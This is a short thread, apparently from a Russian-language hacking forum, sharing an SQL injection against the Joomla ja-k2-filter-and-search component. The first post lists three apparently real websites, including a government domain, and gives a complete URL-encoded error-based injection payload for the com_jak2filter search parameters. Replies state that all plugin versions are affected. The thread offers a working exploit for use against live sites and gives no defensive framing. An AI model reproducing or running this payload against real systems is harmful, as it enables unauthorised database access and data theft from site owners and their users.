PDA

Просмотр полной версии : SQL Injection zero-day in component ja-k2-filter-and-search of Joomla


sTz
23.10.2016, 01:42
http://sherdoust.ir/

http://www.arhitektura.mrt.gov.me/

http://www.cmvcapanema.pr.gov.br/

(WhateverSite)/index.php?category_id=(select%201%20and%20row(1%2c 1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2 cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHA R(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)% 2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%2 01%20union%20select%202)a%20group%20by%20x%20limit %201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27

As a result, the following error message is displayed proving the presence of vulnerability.

http://i2.wp.com/securityaffairs.co/wordpress/wp-content/uploads/2016/10/ja-k2-filter-and-search-Joomla-flaw.png?w=963

brown
23.10.2016, 11:46
Это под какую версию?

androd
23.10.2016, 15:20
brown said:
↑ (https://antichat.live/posts/4004966/)
Это под какую версию?


Плагин

ja-k2-filter-and-search все версии